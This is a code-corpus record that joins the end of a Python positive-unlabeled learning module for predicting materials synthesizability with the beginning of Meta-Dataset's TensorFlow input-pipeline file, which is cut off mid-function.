    Train bagged decision tree base classifiers and do repeated k-fold CV.

    Synthesizability scores (0 = not synthesizable, 1 = already synthesized)
    are generated for an unlabeled sample by averaging the scores from the
    ensemble of decision tree classifiers that have not been trained on that
    sample (transductive, out-of-bag prediction).

    Args:
        pu_data (json): A file of numeric features describing materials.
            There MUST be a column called "PU_label" where a 1 value
            indicates a synthesized (positive) compound and a 0 value
            indicates an unlabeled compound.
        splits (int): Number of splits in k-fold CV.
        repeats (int): Number of repeated k-fold CV.
        bags (int): Number of bags in bootstrap aggregation.
        filename (string): Save model training results to file with
            filename ending in .json or .pkl.

    Returns:
        pu_stats (dict): Metrics and outputs of PU learning model training.
    """
    print('Start PU Learning.')
    # Preprocess data and set attributes.
    # NOTE(review): _process_pu_data is defined elsewhere in this class;
    # presumably it splits df into positive/unlabeled frames and arrays.
    df = pd.read_json(pu_data)
    df_P, df_U, X_P, X_U = self._process_pu_data(df)
    self.df_P = df_P
    self.df_U = df_U
    # Split data into training and test splits for k-fold CV
    kfold = RepeatedKFold(n_splits=splits, n_repeats=repeats,
                          random_state=42)
    # Scores for PU learning (tpr = True Positive Rate)
    scores = []
    tprs = []
    # Predicted synthesis probability of CVed P and U sets.
    # prob_U starts at -1 so never-predicted entries are distinguishable.
    prob_P = np.ones(shape=(X_P.shape[0], splits * repeats))
    prob_U = -np.ones(shape=(X_U.shape[0], splits * repeats))
    # Feature importance, one column per fold
    feat_rank = np.zeros(shape=(X_P.shape[1], splits * repeats))
    idsp = 0  # index of repeated k splits
    # Loop over P and U training/test samples (P and U folds are paired)
    for (ptrain, ptest), (utrain, utest) in zip(kfold.split(X_P), kfold.split(X_U)):
        # Number of P and U training samples
        N_ptrain = X_P[ptrain].shape[0]
        N_utrain = X_U[utrain].shape[0]
        d = X_P.shape[1]  # NOTE(review): unused local
        # Each bag draws K unlabeled samples, balancing the positive set
        K = N_ptrain
        train_label = np.zeros(shape=(N_ptrain + K,))
        train_label[:N_ptrain] = 1.0  # Synthesized (positive)
        # Out of bag samples: per-sample vote counts and probability sums
        n_oob = np.zeros(shape=(N_utrain,))
        f_oob = np.zeros(shape=(N_utrain, 2))
        # Sums of probabilities of test sets (averaged over bags below)
        f_ptest = np.zeros(shape=(X_P[ptest].shape[0], 2))
        f_utest = np.zeros(shape=(X_U[utest].shape[0], 2))
        # Bootstrap resampling for each bag
        for i in range(bags):
            bootstrap_sample = np.random.choice(np.arange(N_utrain), replace=True, size=K)
            # Positive samples and bootstrapped unlabeled samples
            data_bootstrap = np.concatenate((X_P[ptrain], X_U[bootstrap_sample, :]), axis=0)
            # Train decision tree classifier
            model = DecisionTreeClassifier(max_depth=None, max_features=None, criterion='gini', class_weight='balanced')
            model.fit(data_bootstrap, train_label)
            # Index for the oob samples (unlabeled samples not in this bag)
            idx_oob = sorted(set(range(N_utrain)) - set(np.unique(bootstrap_sample)))
            # Transductive learning on oob samples
            f_oob[idx_oob] += model.predict_proba(X_U[utrain][idx_oob])
            n_oob[idx_oob] += 1
            f_ptest += model.predict_proba(X_P[ptest])
            f_utest += model.predict_proba(X_U[utest])
            # NOTE(review): overwritten every bag — only the last bag's
            # feature importances survive for this fold; confirm intended.
            feat_rank[:, idsp] = model.feature_importances_
        # Predicted synthesis probabilities of unlabeled samples
        predict_utrain = f_oob[:, 1] / n_oob
        # Predicted probabilities for P and U test sets
        predict_ptest = f_ptest[:, 1] / bags
        predict_utest = f_utest[:, 1] / bags
        # Find predicted positives (probability threshold 0.5)
        true_pos = predict_ptest[np.where(predict_ptest > 0.5)].shape[0]
        u_pos = predict_utest[np.where(predict_utest > 0.5)].shape[0]
        N_ptest = X_P[ptest].shape[0]
        N_utest = X_U[utest].shape[0]
        # Predicted positive ratio in test set (+epsilon avoids divide-by-zero)
        p_pred_pos = (true_pos + u_pos) / (N_ptest + N_utest) + 0.0001
        # Compute PU recall (TPR) and score metrics (recall^2 / Pr[pred pos],
        # the PU objective of Lee & Liu)
        recall = true_pos / N_ptest
        score = recall**2 / p_pred_pos
        scores.append(score)
        tprs.append(recall)
        # Predicted probabilities
        prob_P[ptest, idsp] = predict_ptest
        prob_U[utrain, idsp] = predict_utrain
        prob_U[utest, idsp] = predict_utest
        idsp += 1
        # Progress update once per completed repeat
        if (idsp + 1) % splits == 0:
            tpr_tmp = np.asarray(tprs[-splits - 1: -1])
            print("Performed Repeated " + str(splits) + "-fold: " + str(idsp // splits + 1) + " out of " + str(repeats))
            print("True Positive Rate: %0.2f (+/- %0.2f)" % (tpr_tmp.mean(), tpr_tmp.std() * 2))
    # Predicted labels from k-fold CV; the extra final column holds the
    # per-sample vote total across all folds.
    label_U = np.zeros(shape=(X_U.shape[0], splits * repeats + 1), dtype=int)
    label_U[:, :splits * repeats][np.where(prob_U > 0.5)] = 1
    label_U[:, splits * repeats] = np.sum(label_U[:, :splits * repeats + 1], axis=1)
    tprs = np.asarray(tprs)
    scores = np.asarray(scores)
    # Metrics for each model in the k-folds, aggregated per repeat
    label_U_rp = np.zeros(shape=(X_U.shape[0], repeats), dtype=int)
    prob_U_rp = np.zeros(shape=(X_U.shape[0], repeats))
    feat_rank_rp = np.zeros(shape=(X_U.shape[1], repeats))
    tpr_rp = np.zeros(shape=(repeats,))
    scores_rp = np.zeros(shape=(repeats,))
    labels = np.zeros(shape=(X_U.shape[0],))
    for i in range(repeats):
        # Average the `splits` folds belonging to repeat i
        prob_U_rp[:, i] = prob_U[:, i * splits:(i + 1) * splits].mean(axis=1)
        feat_rank_rp[:, i] = feat_rank[:, i * splits:(i + 1) * splits].mean(axis=1)
        tpr_rp[i] = tprs[i * splits:(i + 1) * splits].mean()
        scores_rp[i] = scores[i * splits:(i + 1) * splits].mean()
    label_U_rp[np.where(prob_U_rp > 0.5)] = 1
    prob = prob_U_rp.mean(axis=1)
    labels[np.where(prob > 0.5)] = 1
    # Get confidence interval of TPR for each kfold
    tpr_low, tpr_up = self.bootstrapCI(tpr_rp)
    scores_low, scores_up = self.bootstrapCI(scores_rp)
    # PU learning metrics: mean and CI endpoints for TPR and score
    metrics = np.asarray([tpr_rp.mean(), tpr_low, tpr_up,
                          scores_rp.mean(), scores_low, scores_up])
    print("Accuracy: %0.2f" % (tpr_rp.mean()))
    print("95%% confidence interval: [%0.2f, %0.2f]" % (tpr_low, tpr_up))
    # Metrics and results from training / testing
    pu_stats = {'prob': prob, 'labels': labels, 'metrics': metrics,
                'prob_rp': prob_U_rp, 'label_rp': label_U_rp,
                'tpr_rp': tpr_rp, 'scores_rp': scores_rp,
                'feat_rank_rp': feat_rank_rp}
    # Save results (json via monty.dumpfn, or raw pickle)
    if filename:
        if filename.endswith(".json"):
            dumpfn(pu_stats, filename)
        if filename.endswith(".pkl"):
            with open(filename, 'wb') as file:
                pickle.dump(pu_stats, file, protocol=pickle.HIGHEST_PROTOCOL)
    self.pu_stats = pu_stats
    return pu_stats
def bootstrapCI(self, data, ci=95, ns=10000):
    """Compute a bootstrap confidence interval for the mean of `data`.

    Draws `ns` bootstrap resamples (with replacement, same size as
    `data`), computes the mean of each, and returns the empirical
    percentile interval of those means.

    The resampling is done in a single vectorized NumPy draw instead of
    the original per-iteration `sklearn.utils.resample` loop, which is
    much faster for the default ns=10000 and removes an avoidable
    third-party call.

    Args:
        data (array): Array of TPRs (one per repetition of k-fold CV).
        ci (int): Confidence level in percent.
        ns (int): Number of bootstrap resamplings.

    Returns:
        lower (float): Lower endpoint of the CI.
        upper (float): Upper endpoint of the CI.
    """
    data = np.asarray(data)
    # One (ns, len(data)) index matrix = ns resamples with replacement.
    idx = np.random.randint(0, len(data), size=(ns, len(data)))
    bs_means = data[idx].mean(axis=1)
    lower = np.percentile(bs_means, (100 - ci) / 2)
    upper = np.percentile(bs_means, ci + (100 - ci) / 2)
    return lower, upper
def corr_heatmap(self, pu_stats, num_feats=10, fname=''):
    """Plot correlation matrix between synthesizability and features.

    cv_baggingDT must be run first.

    Args:
        pu_stats (dict): Output from cv_baggingDT.
        num_feats (int): How many features to consider.
        fname (str): Filename if correlation plot should be saved.

    Returns:
        None (generates plots)
    """
    df_U = self.df_U
    df_U_copy = df_U.drop(columns=['PU_label'])
    # BUG FIX: use the `pu_stats` the caller passed in; the original
    # silently ignored the argument and read self.pu_stats instead.
    synth_scores = pu_stats['prob']
    df_U_copy['synth_score'] = synth_scores
    # Correlation matrix restricted to the num_feats features most
    # correlated with the synthesizability score.
    corrmat = df_U_copy.corr()
    cols = corrmat.nlargest(num_feats, 'synth_score')['synth_score'].index
    cm = np.corrcoef(df_U_copy[cols].values.T)
    fig, ax = plt.subplots(1, 1)
    # (unused `hm =` binding removed)
    sns.heatmap(cm, ax=ax, cbar=True, annot=True, square=True, fmt='.2f',
                annot_kws={'size': 7}, yticklabels=cols.values,
                xticklabels=cols.values)
    if fname:
        self.save_plot(fname + '.png', fig, ax)
def get_feat_importances(self, pu_stats, plot_format=''):
    """Aggregate feature importances from PU learning k-fold CV.

    cv_baggingDT must be run first. Stores the raw (unsorted,
    unnormalized) per-feature importance sums on self.feat_importances;
    if `plot_format` is given, also saves a bar plot of the sorted,
    normalized importances.

    Args:
        pu_stats (dict): Output from PULearner.cv_baggingDT.
        plot_format (str): 'svg', 'png', or 'pdf' to save a plot; empty
            string to skip plotting.
    """
    # Total importance of each feature, summed over all CV repetitions.
    total_importance = np.sum(pu_stats['feat_rank_rp'], axis=1)
    numeric = self.df_U._get_numeric_data().drop(columns=['PU_label'])
    # Row index of df_feat corresponds to the feature's column position
    # in the original data.
    df_feat = pd.DataFrame(columns=['feature', 'importance'])
    df_feat['feature'] = numeric.columns
    df_feat['importance'] = total_importance
    # The sorted/normalized copy is only used for plotting; the attribute
    # keeps the raw sums in original column order.
    df_feat_sort = df_feat.sort_values(by='importance', ascending=False)
    df_feat_sort['importance'] = (
        df_feat_sort['importance'] / df_feat['importance'].max())
    self.feat_importances = df_feat
    if plot_format in ('svg', 'pdf', 'png'):
        fig, ax = plt.subplots(figsize=(10, 4))
        with sns.axes_style(style='ticks'):
            sns.barplot(x='feature', y='importance', data=df_feat_sort)
        ax.set_xticklabels(ax.get_xticklabels(), rotation=45,
                           ha="right", fontsize=7)
        self.save_plot('feat_importance.' + plot_format, fig, ax)
@staticmethod
def _process_pu_data(data):
    """Split a PU-labeled DataFrame into positive and unlabeled sets.

    Args:
        data (DataFrame): Data with a 'PU_label' column; positive samples
            are labeled 1, unlabeled samples 0.

    Returns:
        df_P (DataFrame): Positive rows.
        df_U (DataFrame): Unlabeled rows.
        X_P (array): Numeric features of positive rows, PU label removed.
        X_U (array): Numeric features of unlabeled rows, PU label removed.
    """
    df_P = data.query("PU_label == 1")  # Positive value is 1
    df_U = data.query("PU_label == 0")  # Unlabeled value is 0
    # The PU label is the last numeric column; strip it (and any
    # non-numeric columns) so sklearn only sees real features.
    X_P = np.asarray(df_P._get_numeric_data())[:, :-1]
    X_U = np.asarray(df_U._get_numeric_data())[:, :-1]
    return df_P, df_U, X_P, X_U
@staticmethod
def save_plot(filename, fig, ax):
    """Write a figure to disk using 'ticks' styling and a tight layout.

    Args:
        filename (str): Name ending in .svg, .png, or .pdf.
        fig, ax (objects): Matplotlib figure and axes; `ax` is accepted
            for interface symmetry with callers but not used here.

    Returns:
        None
    """
    sns.set_style('ticks')
    fig.tight_layout()
    fig.savefig(filename)
class PUInteract():
    def __init__(self, df_parent, pu_parent, df_child, pu_child, merge_on=(), feats=()):
        """Consider parent and child phase PU learning scores.

        This class looks at PU learning scores for parent bulk compounds
        (e.g. layered h-BN) and scores of the child phases along with
        descriptors like exfoliation energy and changes in
        structural/electronic properties to predict (parent, child) pairs
        that can be synthesized.

        Parent and child must be linked by a column that allows the
        dataframes to be merged. There should also be additional features
        that characterize the structural and chemical differences between
        parents and children, e.g. changes in bond lengths, etc.

        Unsupervised clustering models are used to identify synthesizable
        (parent/child) pairs.

        Args:
            df_parent (str): Parent data filename (JSON).
            pu_parent (dict): Output from PULearner.cv_baggingDT.
            df_child (str): Child data filename (JSON).
            pu_child (dict): Output from PULearner.cv_baggingDT.
            merge_on (tuple): Column name(s) on which to merge.
            feats (tuple): Column names to use as features. If empty, use
                all possible columns.

        Attributes:
            merged_df (DataFrame): (Parent, child) pair data.
            X (array): Array representation of merged_df.

        Returns:
            None
        """
        df_parent = pd.read_json(df_parent)
        df_child = pd.read_json(df_child)
        # Experimentally known (positive, PU_label == 1) samples keep a
        # synthesizability score of 1; unlabeled rows get the CV-averaged
        # probability from the PU learner.
        # NOTE(review): assumes pu_*['prob'] is ordered exactly like the
        # PU_label == 0 rows of the corresponding dataframe — confirm
        # against PULearner.cv_baggingDT before reordering either side.
        df_parent['synth_score'] = 1
        df_child['synth_score'] = 1
        df_parent.loc[df_parent.eval('PU_label == 0'), 'synth_score'] = pu_parent['prob']
        df_child.loc[df_child.eval('PU_label == 0'), 'synth_score'] = pu_child['prob']
        # Merge parent and child dfs; outer join keeps unmatched rows from
        # both sides, columns disambiguated with _p/_c suffixes.
        merge_on = list(merge_on)
        df = pd.merge(df_parent, df_child, on=merge_on, how='outer', suffixes=['_p', '_c'])
        df.drop(columns=['PU_label_p', 'PU_label_c'], inplace=True, axis=1)
        if feats:
            # Restrict to the requested features, parent and child variants.
            feat_names = [f + '_p' for f in feats] + [f + '_c' for f in feats]
            df = df[feat_names]
        self.merged_df = df
        self.X = np.array(df)

    def do_kmeans(self, n_clusters=2, seed=42):
        """Do k-means clustering on (parent, child) pairs.

        Args:
            n_clusters (int): Number of clusters.
            seed (int): Fix random seed for kmeans reproducibility.

        Returns:
            kmeans_output (dict): kmeans cluster centers, cluster labels
                for each (parent, child) pair.
        """
        np.random.seed(seed)
        km = KMeans(n_clusters=n_clusters, random_state=seed)
        km.fit(self.X)
        kmeans_output = {'cluster_centers': km.cluster_centers_,
                         'cluster_labels': km.labels_}
        return kmeans_output

    def do_gmixture(self, n_components=2, seed=42):
        """Fit a Gaussian mixture distribution to (parent, child) data.

        Args:
            n_components (int): Number of components in GMM.
            seed (int): Random seed.

        Returns:
            gmm_output (dict): Predicted labels of (parent, child) pairs
                and predicted posterior probabilities of the first
                component.
        """
        np.random.seed(seed)
        gmm = GaussianMixture(n_components=n_components, random_state=seed,
                              covariance_type='full')
        gmm.fit(self.X)
        gmm_labels = gmm.predict(self.X)
        # [:, 0] keeps the posterior of component 0 only.
        gmm_prob = gmm.predict_proba(self.X)[:, 0]
        gmm_output = {'gmm_labels': gmm_labels, 'gmm_prob': gmm_prob}
        return gmm_output

    def do_bgm(self, n_components=6, seed=42):
        """Bayesian Gaussian Mixture.

        Infer the effective number of components in a Gaussian Mixture
        Model via variational Bayesian estimation. The effective number of
        components can be < n_components if the model sets some weights
        close to 0.

        Args:
            n_components (int): Upper bound on number of GMM components.
            seed (int): Random seed.

        Returns:
            bgm_output (dict): Labels and probabilities (posterior of the
                first component).
        """
        np.random.seed(seed)
        bgm = BayesianGaussianMixture(n_components=n_components,
                                      covariance_type='full',
                                      weight_concentration_prior=1e-2,
                                      weight_concentration_prior_type='dirichlet_process',
                                      mean_precision_prior=1e-2,
                                      init_params='random', max_iter=100,
                                      random_state=seed)
        bgm.fit(self.X)
        bgm_labels = bgm.predict(self.X)
        bgm_prob = bgm.predict_proba(self.X)[:, 0]
        bgm_output = {'bgm_labels': bgm_labels, 'bgm_prob': bgm_prob}
        return bgm_output
|
[
"[email protected]"
] | |
44ef8859d033e58a0a9a56f33e20576e31bb6668
|
85310673ac3e45956dfa904fe7fecf5d6c57bfee
|
/meta_dataset/data/pipeline.py
|
df807be9e188307ec47e3ac59bc901316c82b46e
|
[
"Apache-2.0"
] |
permissive
|
ebadrian/meta_dataset
|
c994f15a4cda2bf8e5b51539b174184a3269e5eb
|
bd40ec4486de165fa6f4ca9fe839e1f685a0ee27
|
refs/heads/main
| 2023-01-23T18:59:36.501160 | 2020-12-04T23:49:08 | 2020-12-04T23:49:08 | 318,241,469 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 25,065 |
py
|
# coding=utf-8
# Copyright 2020 The Meta-Dataset Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""This module assembles full input data pipelines.
The whole pipeline incorporate (potentially) multiple Readers, the logic to
select between them, and the common logic to extract support / query sets if
needed, decode the example strings, and resize the images.
"""
# TODO(lamblinp): Organize the make_*_pipeline functions into classes, and
# make them output Batch or EpisodeDataset objects directly.
# TODO(lamblinp): Update variable names to be more consistent
# - target, class_idx, label
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
from absl import logging
import gin.tf
from meta_dataset import data
from meta_dataset.data import decoder
from meta_dataset.data import learning_spec
from meta_dataset.data import reader
from meta_dataset.data import sampling
from six.moves import zip
import tensorflow.compat.v1 as tf
def filter_dummy_examples(example_strings, class_ids):
  """Strip the dummy padding examples from an episode chunk.

  Real examples come first in the tensors; dummy padding examples follow
  and are marked by negative class IDs.

  Args:
    example_strings: 1-D Tensor of dtype str, Example protocol buffers.
    class_ids: 1-D Tensor of dtype int, class IDs (absolute wrt the original
      dataset, except negative ones, which mark dummy examples).

  Returns:
    An (example_strings, class_ids) tuple restricted to the actual
    (non-dummy) examples.
  """
  # All real examples precede the padding, so a count is enough to slice.
  keep = tf.reduce_sum(tf.cast(class_ids >= 0, tf.int32))
  return (example_strings[:keep], class_ids[:keep])
def log_data_augmentation(data_augmentation, name):
  """Logs the given data augmentation parameters for diagnostic purposes."""
  # Guard clause: nothing to describe when no augmentation is configured.
  if not data_augmentation:
    logging.info('No data augmentation provided for %s', name)
    return
  logging.info('%s augmentations:', name)
  logging.info('enable_jitter: %s', data_augmentation.enable_jitter)
  logging.info('jitter_amount: %d', data_augmentation.jitter_amount)
  logging.info('enable_gaussian_noise: %s',
               data_augmentation.enable_gaussian_noise)
  logging.info('gaussian_noise_std: %s', data_augmentation.gaussian_noise_std)
def flush_and_chunk_episode(example_strings, class_ids, chunk_sizes):
  """Drops the flush chunk of an episode and de-pads the remaining chunks.

  The incoming batch is split according to `chunk_sizes` into a leading
  "flush" chunk followed by additional chunks (e.g., in few-shot learning,
  `chunk_sizes = (150, 100, 50)` describes a flush chunk of 150 examples,
  a support chunk of 100, and a query chunk of 50). The flush chunk is
  discarded, and dummy padding examples (negative class IDs) are removed
  from every remaining chunk.

  Args:
    example_strings: 1-D Tensor of dtype str, tf.train.Example protocol
      buffers.
    class_ids: 1-D Tensor of dtype int, class IDs (absolute wrt the original
      dataset).
    chunk_sizes: tuple of ints, sizes of the flush and additional chunks.

  Returns:
    A tuple of de-padded chunks of the form `((chunk_1_strings,
    chunk_1_ids), (chunk_2_strings, chunk_2_ids), ...)`, one entry per
    non-flush element of `chunk_sizes`.
  """
  strings_chunks = tf.split(example_strings, num_or_size_splits=chunk_sizes)
  ids_chunks = tf.split(class_ids, num_or_size_splits=chunk_sizes)
  # [1:] drops the flush chunk from both splits.
  return tuple(
      filter_dummy_examples(s, i)
      for s, i in zip(strings_chunks[1:], ids_chunks[1:]))
@gin.configurable(whitelist=['support_decoder', 'query_decoder'])
def process_dumped_episode(support_strings, query_strings, image_size,
                           support_decoder, query_decoder):
  """Processes a dumped episode.

  This function is almost like `process_episode()`, except:
  - It doesn't need to call flush_and_chunk_episode().
  - The labels are read from the tf.Example directly. We assume that
    labels are already mapped in to [0, n_ways - 1].

  Args:
    support_strings: 1-D Tensor of dtype str, Example protocol buffers of
      support set.
    query_strings: 1-D Tensor of dtype str, Example protocol buffers of query
      set.
    image_size: int, desired image size used during decoding.
    support_decoder: ImageDecoder, used to decode support set images.
    query_decoder: ImageDecoder, used to decode query set images.

  Returns:
    support_images, support_labels, support_labels, query_images,
    query_labels, query_labels: Tensors, batches of images, labels, and
    labels, for the support and query sets (respectively). Labels are
    returned twice since dumped datasets don't have (absolute) class IDs
    anymore.

  Raises:
    TypeError: if either decoder is not an ImageDecoder.
  """
  if isinstance(support_decoder, decoder.ImageDecoder):
    log_data_augmentation(support_decoder.data_augmentation, 'support')
    support_decoder.image_size = image_size
  else:
    raise TypeError('support_decoder type: %s is not ImageDecoder' %
                    type(support_decoder))
  if isinstance(query_decoder, decoder.ImageDecoder):
    log_data_augmentation(query_decoder.data_augmentation, 'query')
    query_decoder.image_size = image_size
  else:
    raise TypeError('query_decoder type: %s is not ImageDecoder' %
                    type(query_decoder))
  # (Redundant duplicate image_size assignments removed; both decoders are
  # already configured in the branches above.)
  support_images, support_labels = tf.map_fn(
      support_decoder.decode_with_label,
      support_strings,
      dtype=(support_decoder.out_type, tf.int32),
      back_prop=False)
  # BUG FIX: decode the query set with `query_decoder` (and its out_type);
  # the original used the support decoder for both sets, so query-specific
  # decoding settings were validated but silently ignored.
  query_images, query_labels = tf.map_fn(
      query_decoder.decode_with_label,
      query_strings,
      dtype=(query_decoder.out_type, tf.int32),
      back_prop=False)
  return (support_images, support_labels, support_labels, query_images,
          query_labels, query_labels)
@gin.configurable(whitelist=['support_decoder', 'query_decoder'])
def process_episode(example_strings, class_ids, chunk_sizes, image_size,
                    support_decoder, query_decoder):
  """Turns a raw episode into decoded support and query sets.

  This function:
  1) splits the batch of examples into "flush", "support", and "query"
     chunks, discarding the "flush" chunk and the padded dummy examples,
  2) decodes the example strings into images, and
  3) builds support and query targets (numbers from 0 to K-1 where K is
     the number of classes in the episode) from the absolute class IDs.

  Args:
    example_strings: 1-D Tensor of dtype str, tf.train.Example protocol
      buffers.
    class_ids: 1-D Tensor of dtype int, class IDs (absolute wrt the original
      dataset).
    chunk_sizes: Tuple of ints representing the sizes of the flush and
      additional chunks.
    image_size: int, desired image size used during decoding.
    support_decoder: Decoder, used to decode support set images.
    query_decoder: Decoder, used to decode query set images.

  Returns:
    support_images, support_labels, support_class_ids, query_images,
    query_labels, query_class_ids: Tensors, batches of images, labels, and
    (absolute) class IDs, for the support and query sets (respectively).
  """
  # Only ImageDecoders carry augmentation settings and an image size; other
  # decoder types are passed through untouched.
  if isinstance(support_decoder, decoder.ImageDecoder):
    log_data_augmentation(support_decoder.data_augmentation, 'support')
    support_decoder.image_size = image_size
  if isinstance(query_decoder, decoder.ImageDecoder):
    log_data_augmentation(query_decoder.data_augmentation, 'query')
    query_decoder.image_size = image_size
  ((support_strings, support_class_ids),
   (query_strings, query_class_ids)) = flush_and_chunk_episode(
       example_strings, class_ids, chunk_sizes)
  support_images = tf.map_fn(
      support_decoder,
      support_strings,
      dtype=support_decoder.out_type,
      back_prop=False)
  query_images = tf.map_fn(
      query_decoder,
      query_strings,
      dtype=query_decoder.out_type,
      back_prop=False)
  # Relabel absolute class IDs to episode-local labels in [0, num_ways).
  _, support_labels = tf.unique(support_class_ids)
  _, query_labels = tf.unique(query_class_ids)
  return (support_images, support_labels, support_class_ids, query_images,
          query_labels, query_class_ids)
@gin.configurable(whitelist=['batch_decoder'])
def process_batch(example_strings, class_ids, image_size, batch_decoder):
  """Decodes a batch of serialized examples into images and labels.

  Args:
    example_strings: 1-D Tensor of dtype str, Example protocol buffers.
    class_ids: 1-D Tensor of dtype int, class IDs (absolute wrt the original
      dataset); used directly as the labels.
    image_size: int, desired image size used during decoding.
    batch_decoder: Decoder class instance for the batch.

  Returns:
    images, labels: Tensors, a batch of images and labels.
  """
  # Only ImageDecoders carry augmentation settings and an image size.
  if isinstance(batch_decoder, decoder.ImageDecoder):
    log_data_augmentation(batch_decoder.data_augmentation, 'batch')
    batch_decoder.image_size = image_size
  images = tf.map_fn(
      batch_decoder,
      example_strings,
      dtype=batch_decoder.out_type,
      back_prop=False)
  return (images, class_ids)
def make_one_source_episode_pipeline(dataset_spec,
                                     use_dag_ontology,
                                     use_bilevel_ontology,
                                     split,
                                     episode_descr_config,
                                     pool=None,
                                     shuffle_buffer_size=None,
                                     read_buffer_size_bytes=None,
                                     num_prefetch=0,
                                     image_size=None,
                                     num_to_take=None):
  """Returns a pipeline emitting data from one single source as Episodes.

  Args:
    dataset_spec: A DatasetSpecification object defining what to read from.
    use_dag_ontology: Whether to use source's ontology in the form of a DAG
      to sample episode classes.
    use_bilevel_ontology: Whether to use source's bilevel ontology
      (superclasses and subclasses) to sample episode classes.
    split: A learning_spec.Split object identifying the source (meta-)split.
    episode_descr_config: An EpisodeDescriptionConfig with parameters for
      sampling shots and ways for episodes.
    pool: String (optional), for example-split datasets, which example split
      to use ('train', 'valid', or 'test'), used at meta-test time only.
    shuffle_buffer_size: int or None, shuffle buffer size for each Dataset.
    read_buffer_size_bytes: int or None, buffer size for each
      TFRecordDataset.
    num_prefetch: int, number of examples to prefetch per class; no
      prefetching if < 1.
    image_size: int, desired image size used during decoding.
    num_to_take: Optional int; if given, restricts each class to that many
      examples from its tfrecord. By default all data is used.

  Returns:
    A Dataset instance that outputs tuples of fully-assembled and decoded
    episodes zipped with the ID of their data source of origin.
  """
  if pool is not None:
    if not data.POOL_SUPPORTED:
      raise NotImplementedError('Example-level splits or pools not supported.')
  take = -1 if num_to_take is None else num_to_take
  ep_reader = reader.EpisodeReader(dataset_spec, split, shuffle_buffer_size,
                                   read_buffer_size_bytes, num_prefetch,
                                   take)
  sampler = sampling.EpisodeDescriptionSampler(
      ep_reader.dataset_spec,
      split,
      episode_descr_config,
      pool=pool,
      use_dag_hierarchy=use_dag_ontology,
      use_bilevel_hierarchy=use_bilevel_ontology,
      use_all_classes=False)
  dataset = ep_reader.create_dataset_input_pipeline(sampler, pool=pool)
  # Raw episodes still contain the flush chunk and dummy padding;
  # `process_episode` strips both, splits support/query, and decodes the
  # example strings.
  process = functools.partial(
      process_episode,
      chunk_sizes=sampler.compute_chunk_sizes(),
      image_size=image_size)
  dataset = dataset.map(process)
  # Single source: every episode belongs to source 0, but zip with a
  # constant source-ID dataset for interface consistency.
  source_ids = tf.data.Dataset.from_tensors(0).repeat()
  dataset = tf.data.Dataset.zip((dataset, source_ids))
  # Overlap episode processing and training.
  return dataset.prefetch(1)
def make_multisource_episode_pipeline(dataset_spec_list,
                                      use_dag_ontology_list,
                                      use_bilevel_ontology_list,
                                      split,
                                      episode_descr_config,
                                      pool=None,
                                      shuffle_buffer_size=None,
                                      read_buffer_size_bytes=None,
                                      num_prefetch=0,
                                      image_size=None,
                                      num_to_take=None):
  """Returns a pipeline emitting data from multiple sources as Episodes.

  Each episode only contains data from one single source. For each episode,
  its source is sampled uniformly across all sources.

  Args:
    dataset_spec_list: A list of DatasetSpecification, one for each source.
    use_dag_ontology_list: A list of Booleans, one for each source: whether
      to use that source's DAG-structured ontology to sample episode
      classes.
    use_bilevel_ontology_list: A list of Booleans, one for each source:
      whether to use that source's bi-level ontology to sample episode
      classes.
    split: A learning_spec.Split object identifying the sources split. It is
      the same for all datasets.
    episode_descr_config: An instance of EpisodeDescriptionConfig containing
      parameters relating to sampling shots and ways for episodes.
    pool: String (optional), for example-split datasets, which example split
      to use ('train', 'valid', or 'test'), used at meta-test time only.
    shuffle_buffer_size: int or None, shuffle buffer size for each Dataset.
    read_buffer_size_bytes: int or None, buffer size for each
      TFRecordDataset.
    num_prefetch: int, the number of examples to prefetch for each class of
      each dataset. Prefetching occurs just after the class-specific Dataset
      object is constructed. If < 1, no prefetching occurs.
    image_size: int, desired image size used during decoding.
    num_to_take: Optional, a list specifying for each dataset the number of
      examples per class to restrict to (for this given split). If provided,
      its length must be the same as len(dataset_spec). If None, no
      restrictions are applied to any dataset and all data per class is
      used.

  Returns:
    A Dataset instance that outputs tuples of fully-assembled and decoded
    episodes zipped with the ID of their data source of origin.

  Raises:
    NotImplementedError: if `pool` is given but pools are unsupported.
    ValueError: if `num_to_take` has the wrong length.
  """
  if pool is not None:
    if not data.POOL_SUPPORTED:
      raise NotImplementedError('Example-level splits or pools not supported.')
  if num_to_take is not None and len(num_to_take) != len(dataset_spec_list):
    raise ValueError('num_to_take does not have the same length as '
                     'dataset_spec_list.')
  if num_to_take is None:
    # -1 means "no restriction" for each source.
    num_to_take = [-1] * len(dataset_spec_list)
  sources = []
  for source_id, (dataset_spec, use_dag_ontology, use_bilevel_ontology,
                  num_to_take_for_dataset) in enumerate(
                      zip(dataset_spec_list, use_dag_ontology_list,
                          use_bilevel_ontology_list, num_to_take)):
    episode_reader = reader.EpisodeReader(dataset_spec, split,
                                          shuffle_buffer_size,
                                          read_buffer_size_bytes, num_prefetch,
                                          num_to_take_for_dataset)
    sampler = sampling.EpisodeDescriptionSampler(
        episode_reader.dataset_spec,
        split,
        episode_descr_config,
        pool=pool,
        use_dag_hierarchy=use_dag_ontology,
        use_bilevel_hierarchy=use_bilevel_ontology)
    dataset = episode_reader.create_dataset_input_pipeline(sampler, pool=pool)
    # Create a dataset to zip with the above for identifying the source.
    source_id_dataset = tf.data.Dataset.from_tensors(source_id).repeat()
    sources.append(tf.data.Dataset.zip((dataset, source_id_dataset)))
  # Sample uniformly among sources.
  dataset = tf.data.experimental.sample_from_datasets(sources)
  # Episodes coming out of `dataset` contain flushed examples and are
  # internally padded with dummy examples. `process_episode` discards
  # flushed examples, splits the episode into support and query sets,
  # removes the dummy examples and decodes the example strings.
  # NOTE(review): `sampler` here is the loop variable leaked from the LAST
  # source; this implicitly assumes every source's sampler yields identical
  # chunk sizes (they all share `episode_descr_config`) — confirm before
  # introducing per-source episode configs.
  chunk_sizes = sampler.compute_chunk_sizes()

  def map_fn(episode, source_id):
    # The per-episode tuple is expanded into process_episode's positional
    # arguments; the source ID is passed through unchanged.
    return process_episode(
